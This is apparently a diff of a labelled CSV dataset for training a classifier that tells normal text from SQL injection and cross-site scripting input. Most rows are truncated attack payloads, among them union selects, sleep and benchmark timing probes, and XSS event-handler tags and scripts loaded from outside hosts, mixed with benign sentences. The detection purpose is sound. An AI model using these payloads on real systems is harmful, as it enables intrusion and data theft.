@@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10597 -1'+ ( select 'nhlx' where 2291 = 2291 or ( select ,2,SQLi,19383 -"<dir onmouseleave=""alert(1)"">test</dir>",1,XSS,6868 -"<dir draggable=""true"" ondrag=""alert(1)"">test</dir>",1,XSS,6513 -"-9440"" union all select 5599,5599,5599,5599,5599--",2,SQLi,12788 -"-1573"" ) union all select 3928,3928,3928,3928--",2,SQLi,15432 -"The lowest amount I could select was $150, the lar",0,normal,25414 -<applet onfocusout=alert(1) tabindex=1 id=x></appl,1,XSS,2714 -1'|| ( select 'vvpn' from dual where 7011 = 7011 a,2,SQLi,15625 --1244 ) as qszw where 2332 = 2332 union all select,2,SQLi,12842 -<svg><big onload=alert(1)></big>,1,XSS,6348 -1 ) ) as rvex where 3462 = 3462 and 4595 = 4595#,2,SQLi,19304 -",(select * from (select(sleep(5)))a)",2,SQLi,11144 -"Choose, then select.",0,normal,24458 -"1%"" and 3580 = ( select count ( * ) from domain.do",2,SQLi,16317 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,1905 -"<style>@keyframes x{}</style><ol style=""animation-",1,XSS,5726 -"<ins onmouseup=""alert(1)"">test</ins>",1,XSS,8261 -1' ) as jrwx where 6087 = 6087 and updatexml ( 339,2,SQLi,20693 -asin,0,normal,23216 -"<a href=""javas\x03cript:javascript:alert(1)"" id=""f",1,XSS,435 -1' ) where 2227 = 2227,2,SQLi,20438 -( select char ( 113 ) +char ( 113 ) +char ( 112 ) ,2,SQLi,13550 -"<var onmouseout=""alert(1)"">test</var>",1,XSS,4857 -Select your authenticate.,0,normal,24998 -"{""id"":null,""name"":""anywhere muscle""}",0,normal,27047 -`'><script>\xE2\x80\xA9javascript:alert(524)</scri,1,XSS,8987 -<th onpointerleave=alert(1)>XSS</th>,1,XSS,2835 -<style>:target {transform: rotate(180deg);}</style,1,XSS,2204 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3446 -1%' ) ) ) or ( select * from ( select ( sleep ( 5 ,2,SQLi,22443 -Once you select the hardware handshake option the ,0,normal,25828 -<textarea onpointerover=alert(1)>XSS</textarea>,1,XSS,6963 -"<bgsound onkeypress=""alert(1)"" contenteditable>tes",1,XSS,8702 -"<canvas draggable=""true"" ondrag=""alert(1)"">test</c",1,XSS,7507 -"<u onpaste=""alert(1)"" contenteditable>test</u>",1,XSS,4281 -"<details onkeypress=""alert(1)"" contenteditable>tes",1,XSS,3768 -Select car.,0,normal,24706 -Where's the hostel?,0,normal,23548 -1 and 9660 = ( select count ( * ) from all_users t,2,SQLi,20078 -"<style>@keyframes x{}</style><canvas style=""animat",1,XSS,8754 -1' where 2547 = 2547 and 6969 = ( select 6969 from,2,SQLi,13521 +"-8833' ) ) union all select 3227,3227,3227,3227,32",2,SQLi,16142 +1' ) ) or 9643 = ( select count ( * ) from domain.,2,SQLi,22352 +") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ",2,SQLi,11304 +"1"" ) where 5938 = 5938 and ( select * from ( selec",2,SQLi,22087 +<style>:target {color: red;}</style><noscript id=x,1,XSS,7773 +"iif ( 8770 = 9611,1,1/0 )",2,SQLi,16855 +"<center onmouseover=""alert(1)"">test</center>",1,XSS,5312 +"<svg><![CDATA[><image xlink:href=""]]><img src=xx:x",1,XSS,9317 +"<noscript draggable=""true"" ondragend=""alert(1)"">te",1,XSS,6612 +<audio onblur=alert(1) tabindex=1 id=x></audio><in,1,XSS,3103 +Activate your Priority Pass Select membershipThe B,0,normal,26409 +"<section draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,8279 +1%' and 3580 = ( select count ( * ) from domain.do,2,SQLi,18366 +or 1 = 1 or '' = ',2,SQLi,11462 +"<nav onmousemove=""alert(1)"">test</nav>",1,XSS,6696 +"<audio autoplay onplay=alert(1)><source src=""valid",1,XSS,27 +"<noframes oncut=""alert(1)"" contenteditable>test</n",1,XSS,5768 +<address onpointerover=alert(1)>XSS</address>,1,XSS,6033 +""")))) and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,11050 +<style>:target {color:red;}</style><element id=x s,1,XSS,3101 +Besides pamphlets on the Catholic and slavery ques,0,normal,26323 +)) waitfor delay '0:0:20' /*,2,SQLi,10927 +"-6629%"" ) ) ) or 8571 = 8571--",2,SQLi,18965 +1'+ ( select 'hrxp' where 5948 = 5948,2,SQLi,19808 +"1"" ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113",2,SQLi,12526 +"1%"" ) ) or ( select * from ( select ( sleep ( 5 ) ",2,SQLi,13153 +<sub id=x tabindex=1 onbeforeactivate=alert(1)></s,1,XSS,6074 +<area onpointerdown=alert(1)>XSS</area>,1,XSS,5703 +1' ) as jxtg where 1071 = 1071 and sleep ( 5 ) --,2,SQLi,21804 "1"" ) ) ) procedure analyse ( extractvalue ( 9255,c",2,SQLi,14369 -1 ) and 3659 = 5475 and ( 8949 = 8949,2,SQLi,14464 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11104 -"1%"" ) ) and 1083 = 6202",2,SQLi,17191 +"end and ""mdje"" like ""mdje",2,SQLi,14357 +"1, ( select ( case when ( 8382 = 8382 ) then 1 els",2,SQLi,13111 +<style>:target {transform: rotate(180deg);}</style,1,XSS,7599 +-3938%' ) ) ) or 2034 = 7209#,2,SQLi,19452 +They always select carefully.,0,normal,24424 +Select a book for your leisure time.,0,normal,24157 +"{""id"":null,""name"":""son""}",0,normal,26980 +<iframe id=x tabindex=1 ondeactivate=alert(1)></if,1,XSS,6457 +"<style onkeypress=""alert(1)"" contenteditable>test<",1,XSS,5121 +<image3 onpointerenter=alert(1)>XSS</image3>,1,XSS,2233 +Select a topic for the research paper.,0,normal,24169 +"1"" ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( ""fqap",2,SQLi,19245 +"<;INPUT TYPE="";IMAGE""; SRC="";javascript:alert(';XS",1,XSS,1592 +"-7146"" where 6431 = 6431 or 8548 = 5549--",2,SQLi,18914 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,12011 +Where did you discover that hidden gem?,0,normal,23707 +<SCRIPT>alert('')</SCRIPT>,1,XSS,6475 +"1 ) where 7425 = 7425 union all select null,null,n",2,SQLi,14140 +"-1407 where 1186 = 1186 union all select 1186,1186",2,SQLi,15351 +"-6951"" union all select 2518,2518,2518,2518,2518,2",2,SQLi,15508 +<;IMG SRC=javascript:alert(';XSS';)>;,1,XSS,1594 +<input type=image src=validimage.png onload=alert(,1,XSS,8640 +&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scr,1,XSS,1084 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4377 +<noscript onpointerleave=alert(1)>XSS</noscript>,1,XSS,3224 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7855 +Having made himself proficient in practical bee-wo,0,normal,26128 +<sub onpointerover=alert(1)>XSS</sub>,1,XSS,2305 +<aside onpointermove=alert(1)>XSS</aside>,1,XSS,3549 +"{""id"":null,""name"":""Maractus""}",0,normal,27309 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10599 +Randomly select again.,0,normal,24799 +<strong onblur=alert(1) tabindex=1 id=x></strong><,1,XSS,6870 +<dd onpointerenter=alert(1)>XSS</dd>,1,XSS,6515 +1' ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ,2,SQLi,12790 +select ( case when ( 3716 = 4021 ) then 3716 else ,2,SQLi,15424 +"The mayor holds office for three years, has the po",0,normal,25411 +"<meter onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,2715 +1'+ ( select 'kqnj' where 9483 = 9483 or elt ( 587,2,SQLi,15617 +"1"" and row ( 6237,7469 ) > ( select count ( * ) ,c",2,SQLi,12844 +<style>:target {color: red;}</style><noframes id=x,1,XSS,6350 +select * from myfile;copy myfile to /tmp/test;,2,SQLi,22517 +-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A)),2,SQLi,11146 +She will select soon.,0,normal,24455 +-7034' ) ) ) union all select 4023#,2,SQLi,16308 +<param id=x tabindex=1 ondeactivate=alert(1)></par,1,XSS,1906 +<ins id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,5728 +<thead id=x tabindex=1 onfocusin=alert(1)></thead>,1,XSS,8263 +1'|| ( select 'nvrq' from dual where 4337 = 4337 o,2,SQLi,20691 +sin,0,normal,23213 +"<a href=""javas\x03cript:javascript:alert(1)"" id=""f",1,XSS,435 +Delete bookmarks.,0,normal,23051 +1 ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ,2,SQLi,13543 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4859 +Select your inspect.,0,normal,24995 +"{""id"":null,""firstName"":""Htain"",""lastName"":""Linn"",""",0,normal,27044 +`'><script>\xE2\x8523\x9Fjavascript:alert(523)</sc,1,XSS,8989 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2836 +"<plaintext onkeydown=""alert(1)"" contenteditable>te",1,XSS,2205 +<img onpointerout=alert(1)>XSS</img>,1,XSS,3448 +"-3719"" union all select 6609,6609,6609,6609#",2,SQLi,15663 +One needs to select all atoms in the cage - these ,0,normal,25825 +"<style>@keyframes x{}</style><blink style=""animati",1,XSS,6965 +"<noscript onbeforepaste=""alert(1)"" contenteditable",1,XSS,8704 +"<fieldset onmouseup=""alert(1)"">test</fieldset>",1,XSS,7509 +<samp onpointermove=alert(1)>XSS</samp>,1,XSS,4283 +<center onpointerenter=alert(1)>XSS</center>,1,XSS,3770 +Select courier.,0,normal,24703 +Where's the club?,0,normal,23545 +"1', ( select ( case when ( 5217 = 5217 ) then 1 el",2,SQLi,20076 +"<track onmouseenter=""alert(1)"">test</track>",1,XSS,8756 +"1"" ) ) as hbfi where 4773 = 4773 and 7756 = dbms_u",2,SQLi,20812 +select case when 9390 = 5752 then 1 else null end-,2,SQLi,14362 +1' ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ,2,SQLi,14457 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11106 +Insert a USB drive.,0,normal,22784 "<IMG SRC=""javascript:javascript:alert(1)""",1,XSS,744 -<video onloadstart=alert(1)><source>,1,XSS,9327 -"1"" ) where 3321 = 3321",2,SQLi,22229 -"<html onmouseup=""alert(1)"">test</html>",1,XSS,5379 --3441' ) ) as dxvt where 9291 = 9291 union all sel,2,SQLi,15905 -(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#,2,SQLi,10408 -<u id=x tabindex=1 onfocus=alert(1)></u>,1,XSS,3239 -"<map draggable=""true"" ondrag=""alert(1)"">test</map>",1,XSS,7241 -1 and 5934 = 7745,2,SQLi,13524 +"<w=""/x=""y>""/OndbLcLick=`<`[confir\u006d``]>z",1,XSS,9329 +1' ) or 4915 = ( select count ( * ) from domain.do,2,SQLi,22227 +"<sup onkeypress=""alert(1)"" contenteditable>test</s",1,XSS,5381 +"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,15897 +#ERROR!,2,SQLi,10410 +"<nextid onkeypress=""alert(1)"" contenteditable>test",1,XSS,3241 +"<style>@keyframes x{}</style><dt style=""animation-",1,XSS,7243 +-6588' where 7793 = 7793 or ( 8459 = 8459 ) *4906-,2,SQLi,13517 "‘;alert(String.fromCharCode(88,83,83))//’;alert(St",1,XSS,933 -"<select onmousedown=""alert(1)"">test</select>",1,XSS,8383 -",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:",2,SQLi,10889 -1 where 2301 = 2301,2,SQLi,19610 -Merge the musical notes.,0,normal,22568 -<image src=validimage.png onloadend=alert(1)>,1,XSS,3485 -1 where 7055 = 7055,2,SQLi,22081 -<object onafterscriptexecute=confirm(0)>,1,XSS,9710 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,16644 -"-3525"" where 3522 = 3522 union all select 3522,352",2,SQLi,16239 -&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt,1,XSS,1369 -<tt id=x tabindex=1 ondeactivate=alert(1)></tt><in,1,XSS,7591 -"<summary onbeforepaste=""alert(1)"" contenteditable>",1,XSS,4205 --8665' or 6825 = 7840 and 'vbsy' like 'vbsy,2,SQLi,12211 -<style>@import'http://www.securitycompass.com/xss.,1,XSS,1548 -1' ) or 9643 = ( select count ( * ) from domain.do,2,SQLi,14459 -"{""id"":null,""name"":""flame class""}",0,normal,27093 -"1%"" ) ) and sleep ( 5 ) #",2,SQLi,17497 -1'+ ( select twyt where 3376 = 3376 and 7756 = dbm,2,SQLi,12201 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10713 -1' ) ) as egsj where 3447 = 3447,2,SQLi,13735 -"1' where 4039 = 4039 union all select null,null,nu",2,SQLi,18959 -") or (a""=""a",2,SQLi,10011 -Select a domain name service provider or registrar,0,normal,25662 -Join band.,0,normal,23034 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7480 -"<code onmouseenter=""alert(1)"">test</code>",1,XSS,8546 -"<IMG SRC=\""jav&#x0A;ascript:alert('XSS');\"">",1,XSS,1286 --8612'+ ( select 'iqla' where 5035 = 5035 union al,2,SQLi,22279 -"<script>$(""span.foo"").click(function() {alert('foo",1,XSS,9275 -Select mentor.,0,normal,24716 -<optgroup id=x tabindex=1 onbeforedeactivate=alert,1,XSS,8826 -<footer id=x tabindex=1 onactivate=alert(1)></foot,1,XSS,1936 -1' ) ) as qzyp where 5081 = 5081 or 2633 = dbms_pi,2,SQLi,18530 -"<header onpaste=""alert(1)"" contenteditable>test</h",1,XSS,4900 -Select a quote to inspire.,0,normal,24113 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10663 -"<wbr onmouseleave=""alert(1)"">test</wbr>",1,XSS,3992 -<img onpointerout=alert(1)>XSS</img>,1,XSS,3448 -1'+ ( select 'supo' where 8691 = 8691,2,SQLi,17682 -"<IMG SRC=x onblur=""alert(String.fromCharCode(88,83",1,XSS,1186 -1' where 8770 = 8770 union all select null--,2,SQLi,14417 -`'><script>\x2531javascript:alert(531)</script>,1,XSS,8971 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3022 -SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#,1,XSS,9369 -1'|| ( select 'tisi' from dual where 1616 = 1616 a,2,SQLi,21285 -Select the ideal setting for the occasion.,0,normal,24025 -like '%',2,SQLi,9956 -"<area onclick=""alert(1)"">test</area>",1,XSS,6212 -"In select cities, you can also order flowers from ",0,normal,25989 -"1%"" ) ) and ( select * from ( select ( sleep ( 5 )",2,SQLi,19436 -"<del ondblclick=""alert(1)"">test</del>",1,XSS,4596 -"1' ) or ( select 9173 from ( select count ( * ) ,c",2,SQLi,21885 -1' ) ) or 8156 = ( select count ( * ) from generat,2,SQLi,12085 -"1%"" ) ) or 7427 = dbms_pipe.receive_message ( chr ",2,SQLi,15853 -1 ) ) as rcbz where 4563 = 4563 and 2006 = 2006,2,SQLi,17002 -"{""id"":null,""firstName"":""Sindy"",""lastName"":""Chu"",""s",0,normal,27484 -"end and ( ""vwbx"" = ""vwbx",2,SQLi,12195 -"1%' ) ) and 4241 = convert ( int, ( select char ( ",2,SQLi,17787 -ORDER BY 27,2,SQLi,10331 -"<div id=""135""><?xml-stylesheet type=""text/xsl"" hre",1,XSS,9124 -1'+ ( select 'leok' where 4320 = 4320,2,SQLi,13560 -"<tfoot onmousedown=""alert(1)"">test</tfoot>",1,XSS,5143 -"<fieldset onmouseout=""alert(1)"">test</fieldset>",1,XSS,4994 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3812 -<style>:target {transform: rotate(180deg);}</style,1,XSS,2292 -"<IMG SRC=x onpaste=""alert(String.fromCharCode(88,8",1,XSS,1217 --2920' ) ) or 2724 in ( ( char ( 113 ) +char ( 113,2,SQLi,20834 -"<rp onbeforecut=""alert(1)"" contenteditable>test</r",1,XSS,3604 -"1"" ) where 9962 = 9962 and 4595 = 4595#",2,SQLi,21412 -"As an example, here are the steps for most Samsung",0,normal,26353 -Plant a cherry tree.,0,normal,22612 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10706 -1' ) where 1917 = 1917 union all select null#,2,SQLi,22379 -1 ) ) as avdz where 1881 = 1881 and 6510 = ( selec,2,SQLi,18672 -"<;SCRIPT a="";>;""; SRC="";http://ha.ckers.org/xss.js",1,XSS,1660 -ORDER BY 21--,2,SQLi,10263 -1' ) and exp ( ~ ( select * from ( select concat (,2,SQLi,22396 -1' where 1893 = 1893 and 9254 = ( select count ( *,2,SQLi,13166 +<source id=x tabindex=1 onfocusin=alert(1)></sourc,1,XSS,8385 +""",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0",2,SQLi,10891 +"1"" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 11",2,SQLi,19608 +1 ) ) as jyfo where 8121 = 8121 and 9254 = ( selec,2,SQLi,15928 +<xss id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,3487 +"1"" or 9643 = ( select count ( * ) from domain.doma",2,SQLi,22079 +<script>window['alert'](document['domain'])<script,1,XSS,9712 +"{""id"":null,""firstName"":""Angie"",""lastName"":""Ang"",""s",0,normal,26765 +1' ) ) ) and ( 5995 = 9618 ) *9618 and ( ( ( 'nagr,2,SQLi,16231 +&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/,1,XSS,1370 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7593 +<style>:target {transform: rotate(180deg);}</style,1,XSS,4207 +1'|| ( select 'bnaz' from dual where 7168 = 7168 a,2,SQLi,12213 +"<meta HTTP-EQUIV=""Link"" Content=""<http://www.secur",1,XSS,1549 +1'+ ( select bldn where 8321 = 8321 and 8635 = ( s,2,SQLi,14452 +1' in boolean mode ),2,SQLi,19540 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,19874 +1 ) and 3754 = ( select upper ( xmltype ( chr ( 60,2,SQLi,12203 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10715 +select ( case when ( 4666 = 4666 ) then 1 else 466,2,SQLi,13728 +"-4028 ) where 3244 = 3244 union all select 3244,32",2,SQLi,15082 +or 'one'='one,2,SQLi,10013 +"1"" ) as ypfa where 6128 = 6128",2,SQLi,18483 +"1"" or sleep ( 5 ) and ""telb"" = ""telb",2,SQLi,16834 +"<samp draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,7482 +"<hr onbeforecut=""alert(1)"" contenteditable>test</h",1,XSS,8548 +"<IMG SRC=\""jav&#x0D;ascript:alert('XSS');\"">",1,XSS,1287 +"1"" or exp ( ~ ( select * from ( select concat ( 0x",2,SQLi,22277 +<script>(function() {var event = document.createEv,1,XSS,9277 +"1"" ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ",2,SQLi,14707 +<map onblur=alert(1) tabindex=1 id=x></map><input ,1,XSS,8828 +"<thead draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,1937 +"{""id"":null,""firstName"":""Vanessa"",""lastName"":""Zhou""",0,normal,27049 +"<script onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,4902 +"-8709"" or 8571 = 8571--",2,SQLi,20723 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10665 +"<svg><path><animateMotion onrepeat=alert(1) dur=""1",1,XSS,3994 +"<big oncut=""alert(1)"" contenteditable>test</big>",1,XSS,3450 +1 ) as drgs where 1989 = 1989 order by 1--,2,SQLi,14635 +"<IMG SRC=x onchange=""alert(String.fromCharCode(88,",1,XSS,1187 +"1, ( select ( case when ( 5885 = 1825 ) then 1 els",2,SQLi,21176 +`'><script>\x7Ejavascript:alert(521)</script>,1,XSS,8973 +"<data onpaste=""alert(1)"" contenteditable>test</dat",1,XSS,3023 +"`-alert(1)"">'onload=""`<svg/1='",1,XSS,9371 +"1%' ) union all select null,null,null,null--",2,SQLi,19698 +1' ) ) ) or 5286 = ( select count ( * ) from all_u,2,SQLi,18185 +or 0=0 #,2,SQLi,9958 +<meter onpointerdown=alert(1)>XSS</meter>,1,XSS,6214 +"-4639"" ) ) ) or 8550 = 9348",2,SQLi,17302 +"1%' ) union all select null,null,null,null,null,nu",2,SQLi,19434 +<meter onpointerenter=alert(1)>XSS</meter>,1,XSS,4598 +1 ) ) as gobw where 3496 = 3496 union all select n,2,SQLi,16798 +-4860' ) as azyx where 6901 = 6901 union all selec,2,SQLi,12087 +1 ) where 3565 = 3565 and 6969 = ( select 6969 fro,2,SQLi,15573 +1 ) as amgf where 4308 = 4308 and char ( 120 ) ||c,2,SQLi,17000 +1' in boolean mode ) or char ( 68 ) ||char ( 69 ) ,2,SQLi,19062 +1' ) ) rlike sleep ( 5 ) and ( ( 'iwct' = 'iwct,2,SQLi,12197 +1%' ) ) ) and ( 9404 = 8390 ) *8390 and ( ( ( '%' ,2,SQLi,17785 +ORDER BY 29,2,SQLi,10333 +"<div id=""137""><svg>",1,XSS,9126 +"{""id"":null,""name"":""Meganium""}",0,normal,26751 +"<col onmouseover=""alert(1)"">test</col>",1,XSS,5145 +"<track onmouseout=""alert(1)"">test</track>",1,XSS,4996 +"<frame onpaste=""alert(1)"" contenteditable>test</fr",1,XSS,3814 +<figcaption onpointerdown=alert(1)>XSS</figcaption,1,XSS,2293 +"<IMG SRC=x onabort=""alert(String.fromCharCode(88,8",1,XSS,1218 +The king was indeed the president of the permanent,0,normal,25420 +<style>:target {transform: rotate(180deg);}</style,1,XSS,3606 +1 ) where 1622 = 1622,2,SQLi,22413 +1'+ ( select yjyp where 9696 = 9696,2,SQLi,15694 +Filter the spam messages.,0,normal,22609 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10708 +-3846%' or 6872 = 6872 and '%' = ',2,SQLi,22377 +"1' ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( (",2,SQLi,20264 +"<;SCRIPT ="";blah""; SRC="";http://ha.ckers.org/xss.j",1,XSS,1661 +ORDER BY 23--,2,SQLi,10265 +1' where 2690 = 2690,2,SQLi,18888 +1 and ( 3020 = 3020 ) *6703,2,SQLi,20365 &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00,1,XSS,843 -"<s onbeforecut=""alert(1)"" contenteditable>test</s>",1,XSS,2978 -"<dialog onmouseout=""alert(1)"">test</dialog>",1,XSS,7409 --3834' ) ) as hhiy where 2086 = 2086 or 3038 = 303,2,SQLi,12219 -"-5827"" ) as lskq where 7683 = 7683 union all selec",2,SQLi,12275 --4684 ) as uqjn where 4550 = 4550 or 1689 = 5825,2,SQLi,14834 -"<style>@keyframes x{}</style><ruby style=""animatio",1,XSS,2092 -"-9922' ) ) union all select 2193,2193,2193--",2,SQLi,15585 -"1"" ) as uyms where 6210 = 6210 and 6055 = ctxsys.d",2,SQLi,17568 -<svg><set onbegin=alert(1) attributename=x dur=1s>,1,XSS,6368 -"<multicol onbeforecopy=""alert(1)"" contenteditable>",1,XSS,3064 -1 and exp ( ~ ( select * from ( select concat ( 0x,2,SQLi,20460 -<iframe onload=%22write('<script>'%2Blocation.hash,1,XSS,9192 +"<plaintext oncopy=""alert(1)"" contenteditable>test<",1,XSS,2979 +"<blink onkeypress=""alert(1)"" contenteditable>test<",1,XSS,7411 +select ( case when ( 1039 = 5127 ) then 1039 else ,2,SQLi,12221 +"-3697' ) ) ) union all select 5180,5180,5180,5180,",2,SQLi,12277 +Fetch data where necessary.,0,normal,23366 +"<dfn draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,2093 +1 ) ) and 8514 = ( select count ( * ) from domain.,2,SQLi,19489 +Select your appearance.,0,normal,24891 +"<strike oncopy=""alert(1)"" contenteditable>test</st",1,XSS,6370 +"<title onkeyup=""alert(1)"" contenteditable>test</ti",1,XSS,3065 +1' ) ) order by 1--,2,SQLi,20458 +"<iframe src=""http://example.org/""></iframe>",1,XSS,9194 "<a href=""jav&#65ascript:javascript:alert(1)"">test1",1,XSS,792 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,11001 -"1%"" ) ) union all select null,null,null,null,null,",2,SQLi,12457 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,11003 +"1' ) ) union all select null,null,null,null,null,n",2,SQLi,12459 "{""id"":null,""firstName"":""Exam"",""lastName"":""Papers"",",0,normal,27571 -"<kbd onmouseenter=""alert(1)"">test</kbd>",1,XSS,2634 -<ul id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,3298 -<canvas id=x tabindex=1 onactivate=alert(1)></canv,1,XSS,7156 -"1 where 1186 = 1186 union all select null,null,nul",2,SQLi,22039 -Where's the nearest park?,0,normal,23494 -If you want your Xbox One to display everything in,0,normal,26040 -<i id=x tabindex=1 onbeforedeactivate=alert(1)></i,1,XSS,5522 -<style>:target {color:red;}</style><noframes id=x ,1,XSS,6005 -"1"" and 1668 = 8288",2,SQLi,13327 -<style>@keyframes slidein {}</style><figure style=,1,XSS,4101 -"<progress oncontextmenu=""alert(1)"">test</progress>",1,XSS,7927 -"{""id"":null,""firstName"":""James"",""lastName"":""Tan"",""a",0,normal,26863 -Let's decide where to go for a relaxing break.,0,normal,23948 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11093 -"1"" and elt ( 2373 = 5817,5817 ) and ""rsdt"" = ""rsdt",2,SQLi,15605 -Select the best method.,0,normal,24299 +"<span onmousedown=""alert(1)"">test</span>",1,XSS,2635 +"<del oncontextmenu=""alert(1)"">test</del>",1,XSS,3300 +"<BODY BACKGROUND=""javascript:alert('')"">",1,XSS,7158 +"select * from generate_series ( 2673,2673,case whe",2,SQLi,22037 +Select the best wedding officiant.,0,normal,24375 +"1' ) and elt ( 1210 = 1210,sleep ( 5 ) )",2,SQLi,22445 +<blink onpointerup=alert(1)>XSS</blink>,1,XSS,5524 +"<del draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,6007 +-4323' ) ) or 6968 = 1393,2,SQLi,13320 +<svg><section onload=alert(1)></section>,1,XSS,4103 +<isindex id=x tabindex=1 ondeactivate=alert(1)></i,1,XSS,7929 +"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,19306 +I'm thinking of where to go for a bike ride.,0,normal,23945 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11095 +1 ) and 3754 = ( select upper ( xmltype ( chr ( 60,2,SQLi,15597 +1' ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ),2,SQLi,14665 <svg><animate onend=alert(1) attributeName=x dur=1,1,XSS,15 -<nobr id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,4779 -<dir onblur=alert(1) tabindex=1 id=x></dir><input ,1,XSS,2793 -"1"" ) ) and 6414 = ( select count ( * ) from rdb$fi",2,SQLi,19855 -""" or ""a""=""a",2,SQLi,11120 -I'm considering where to take a photography class.,0,normal,23884 -"1"" and ( 3020 = 3020 ) *6703",2,SQLi,13906 -"<style>@keyframes slidein {}</style><i style=""anim",1,XSS,5923 -"1%' ) union all select null,null,null,null,null,nu",2,SQLi,18098 -"-9864"" ) or elt ( 5885 = 4936,4936 ) and ( ""bfbb"" ",2,SQLi,20737 -or ''&',2,SQLi,9882 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8068 -"-9057"" ) or 1 group by concat ( 0x7171706a71, ( se",2,SQLi,13315 -I want to choose a new book to read.,0,normal,23705 -The males appear to compete with each other in the,0,normal,25412 +"<fieldset onclick=""alert(1)"">test</fieldset>",1,XSS,4781 +"<rp onmouseenter=""alert(1)"">test</rp>",1,XSS,2794 +1' ) and 8514 = ( select count ( * ) from domain.d,2,SQLi,13378 +or 'something' like 'some%',2,SQLi,11122 +1' where 1230 = 1230 or char ( 75 ) ||char ( 70 ) ,2,SQLi,18212 +"1%"" and char ( 109 ) ||char ( 79 ) ||char ( 70 ) |",2,SQLi,15121 +<blink onpointerdown=alert(1)>XSS</blink>,1,XSS,5925 +Step 3: Select your GIF and then tap the > button.,0,normal,25521 +Update your profile details with accuracy.,0,normal,22984 +or ''*',2,SQLi,9884 +"<slot onmousedown=""alert(1)"">test</slot>",1,XSS,8070 +""" Scroll down to ""importance markers"" and select """,0,normal,26472 +Where did you spot that unique sculpture from?,0,normal,23702 +The method in the latter case is to select roots a,0,normal,25409 <audio autoplay controls onseeking=alert(1)><sourc,1,XSS,99 -<style>:target {color:red;}</style><header id=x st,1,XSS,2607 -""")))) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11051 -1' and 8514 = ( select count ( * ) from domain.dom,2,SQLi,16894 -1' ) ) rlike ( select ( case when ( 7689 = 7689 ) ,2,SQLi,19827 -"{""id"":null,""name"":""please ring""}",0,normal,27003 -"<menu oncut=""alert(1)"" contenteditable>test</menu>",1,XSS,7039 -We've been asking respondents to select from the l,0,normal,25164 +"<keygen onkeypress=""alert(1)"" contenteditable>test",1,XSS,2608 +a' or 1=1; --,2,SQLi,11053 +-3424' ) ) or 4144 = ( select upper ( xmltype ( ch,2,SQLi,16892 +1 ) ) ( select ( case when ( 4587 = 4587 ) then re,2,SQLi,19825 +"1"" ) as ufai where 9673 = 9673",2,SQLi,20763 +<blockquote onpointerleave=alert(1)>XSS</blockquot,1,XSS,7041 +user,0,normal,23169 <body onbeforeprint=console.log(1)>,1,XSS,6 -1' or sleep ( 5 ) and 'udqz' = 'udqz,2,SQLi,19613 -Sort the scattered books.,0,normal,22578 